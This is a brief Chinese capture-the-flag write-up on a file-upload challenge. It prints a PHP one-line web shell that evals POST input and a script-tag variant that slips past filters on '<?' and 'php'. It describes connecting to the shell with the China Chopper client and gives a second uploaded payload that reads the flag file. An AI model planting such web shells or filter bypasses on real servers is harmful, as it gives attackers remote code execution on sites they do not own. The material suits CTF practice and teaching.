首先把包含一句話的文件上傳,php內容文件如下:
<?php
eval($_POST['a']);
?>
如果會過濾 <? 和 php 關鍵字,可以使用長標籤
<script language="pHp">@eval($_POST['sb'])</script>
打開中國菜刀主頁面,右鍵點擊添加,配置如下(密碼即上面的sb)
點擊右鍵文件管理如下:
即可獲得flag:
還有一種直接在上傳文件的php代碼中獲取flag文件的內容:
<script language="PHP">
$fh=fopen("../flag.".strtolower("PHP"),'r'); #strtolower() 函數把字符串轉換爲小寫
echo fread($fh,filesize("../flag.".strtolower("PHP"))); #點號.是連接符,開始還用+號來連接,搞錯了。
fclose($fh);
</script>
點擊右鍵查看源代碼:
--參考i春秋https://www.ichunqiu.com/battalion